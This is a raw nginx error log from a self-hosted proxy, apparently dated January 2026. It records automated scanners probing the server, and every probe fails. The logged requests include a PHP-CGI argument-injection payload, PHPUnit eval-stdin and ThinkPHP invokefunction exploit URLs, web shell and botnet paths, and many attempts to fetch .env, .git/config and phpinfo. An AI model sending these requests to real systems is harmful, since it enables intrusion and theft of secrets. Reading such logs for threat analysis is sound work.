"91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:34 [error] 266#266: *16255 open() "/var/www/html/fs.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /fs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:34 [error] 266#266: *16255 open() "/var/www/html/33.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /33.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:34 [error] 266#266: *16255 open() "/var/www/html/v2.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /v2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:35 [error] 266#266: *16255 open() "/var/www/html/new4.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /new4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:47:22 [error] 266#266: *16270 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:20:51 [error] 267#267: *16314 open() "/var/www/html/_next" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:20:51 [error] 267#267: *16315 open() "/var/www/html/api" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:20:52 [error] 267#267: *16316 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:20:52 [error] 267#267: *16317 open() "/var/www/html/app" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:20:52 [error] 267#267: *16318 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:19 [error] 267#267: *16349 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:20 [error] 267#267: *16349 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:21 [error] 267#267: *16349 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:21 [error] 267#267: *16349 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:21 [error] 267#267: *16349 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:22 [error] 267#267: *16349 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:22 [error] 267#267: *16349 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:22 [error] 267#267: *16349 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:22 [error] 267#267: *16349 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:22 [error] 267#267: *16349 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:22 [error] 267#267: *16349 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:23 [error] 267#267: *16349 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:23 [error] 267#267: *16349 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:24 [error] 267#267: *16349 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:24 [error] 267#267: *16349 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:24 [error] 267#267: *16349 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:24 [error] 267#267: *16349 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:25 [error] 267#267: *16349 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:25 [error] 267#267: *16349 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:25 [error] 267#267: *16349 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:25 [error] 267#267: *16349 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:26 [error] 267#267: *16349 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:26 [error] 267#267: *16349 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:29 [error] 267#267: *16349 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:29 [error] 267#267: *16349 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:29 [error] 267#267: *16349 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:29 [error] 267#267: *16349 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:30 [error] 267#267: *16349 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:30 [error] 267#267: *16349 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:31 [error] 267#267: *16349 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:31 [error] 267#267: *16349 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:31 [error] 267#267: *16349 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:31 [error] 267#267: *16349 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:31 [error] 267#267: *16349 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:31 [error] 267#267: *16349 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:31 [error] 267#267: *16349 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:32 [error] 267#267: *16349 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:32 [error] 267#267: *16349 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:32 [error] 267#267: *16349 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:32 [error] 267#267: *16349 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 10:48:33 [error] 267#267: *16349 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 74.208.72.110, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 11:13:59 [error] 271#271: *16384 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.221.66.74, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/21 12:05:50 [error] 271#271: *16458 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 12:09:08 [error] 271#271: *16466 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 12:31:16 [error] 272#272: *16496 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 151.242.144.223, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 13:06:58 [error] 272#272: *16525 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 13:35:05 [error] 272#272: *16546 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:07 [error] 272#272: *16547 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:07 [error] 272#272: *16548 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:07 [error] 272#272: *16549 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:07 [error] 272#272: *16550 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:07 [error] 273#273: *16551 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:08 [error] 273#273: *16552 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:09 [error] 273#273: *16553 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:09 [error] 273#273: *16554 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:09 [error] 273#273: *16555 open() "/var/www/html/m/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /m/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:16 [error] 273#273: *16556 open() "/var/www/html/remote/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /remote/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:16 [error] 273#273: *16557 open() "/var/www/html/webmail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /webmail/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:16 [error] 273#273: *16558 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:16 [error] 273#273: *16559 open() "/var/www/html/vpn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /vpn/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:17 [error] 273#273: *16560 open() "/var/www/html/secure/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /secure/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:17 [error] 273#273: *16561 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:17 [error] 273#273: *16562 open() "/var/www/html/cloud/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cloud/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:17 [error] 273#273: *16563 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:17 [error] 273#273: *16564 open() "/var/www/html/host/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /host/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:19 [error] 273#273: *16565 open() "/var/www/html/support/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /support/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:20 [error] 273#273: *16566 open() "/var/www/html/pop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /pop/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:20 [error] 274#274: *16567 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:20 [error] 274#274: *16568 open() "/var/www/html/cdn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cdn/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:22 [error] 274#274: *16569 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:22 [error] 274#274: *16570 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:22 [error] 274#274: *16571 open() "/var/www/html/smtp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /smtp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:22 [error] 274#274: *16572 open() "/var/www/html/ftp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /ftp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:22 [error] 274#274: *16573 open() "/var/www/html/wiki/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /wiki/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:22 [error] 274#274: *16574 open() "/var/www/html/help/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /help/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:35:22 [error] 274#274: *16575 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "91.82.83.208" +2026/01/21 13:43:06 [error] 274#274: *16586 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 13:58:26 [error] 274#274: *16602 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/home.asp" +2026/01/21 14:19:22 [error] 271#271: *16619 open() "/var/www/html/app/api/login" failed (2: No such file or directory), client: 104.244.79.113, server: localhost-nginx-proxy-manager, request: "POST /app/api/login HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 15:19:53 [error] 271#271: *16674 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 15:56:24 [error] 272#272: *16709 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 16:06:54 [error] 272#272: *16923 open() "/var/www/html/vpn/js/rdx/core/lang/rdx_en.json.gz" failed (2: No such file or directory), client: 23.92.30.34, server: localhost-nginx-proxy-manager, request: "GET /vpn/js/rdx/core/lang/rdx_en.json.gz HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:07:06 [error] 272#272: *16924 open() "/var/www/html/wsman" failed (2: No such file or directory), client: 45.56.115.40, server: localhost-nginx-proxy-manager, request: "POST /wsman HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:07:56 [error] 273#273: *16926 open() "/var/www/html/_layouts/15/error.aspx" failed (2: No such file or directory), client: 45.79.207.79, server: localhost-nginx-proxy-manager, request: "GET /_layouts/15/error.aspx HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:08:11 [error] 273#273: *16928 open() "/var/www/html/auth.html" failed (2: No such file or directory), client: 50.116.48.28, server: localhost-nginx-proxy-manager, request: "GET /auth.html HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:08:11 [error] 273#273: *16929 open() "/var/www/html/auth1.html" failed (2: No such file or directory), client: 50.116.48.28, server: localhost-nginx-proxy-manager, request: "GET /auth1.html HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:08:11 [error] 273#273: *16930 open() "/var/www/html/sslvpnLogin.html" failed (2: No such file or directory), client: 50.116.48.28, server: localhost-nginx-proxy-manager, request: "GET /sslvpnLogin.html HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:08:11 [error] 273#273: *16931 open() "/var/www/html/api/sonicos/auth" failed (2: No such file or directory), client: 50.116.48.28, server: localhost-nginx-proxy-manager, request: "GET /api/sonicos/auth HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:08:12 [error] 273#273: *16932 open() "/var/www/html/api/sonicos/tfa" failed (2: No such file or directory), client: 50.116.48.28, server: localhost-nginx-proxy-manager, request: "GET /api/sonicos/tfa HTTP/1.1", host: "91.82.83.208" +2026/01/21 16:53:57 [error] 273#273: *18488 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 17:37:36 [error] 278#278: *18538 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 17:39:57 [error] 278#278: *18539 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 18:26:18 [error] 278#278: *18575 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 18:45:26 [error] 278#278: *18591 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 167.99.210.13, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:13:54 [error] 279#279: *18619 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:40:49 [error] 279#279: *18647 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 146.190.93.166, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:40:50 [error] 279#279: *18648 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 146.190.93.166, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:40:51 [error] 279#279: *18649 open() "/var/www/html/t4" failed (2: No such file or directory), client: 146.190.93.166, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:40:51 [error] 279#279: *18650 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 146.190.93.166, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:40:53 [error] 278#278: *20138 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 146.190.93.166, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:40:54 [error] 278#278: *20139 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 146.190.93.166, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "91.82.83.208" +2026/01/21 19:40:55 [error] 278#278: *20140 open() "/var/www/html/password.php" failed 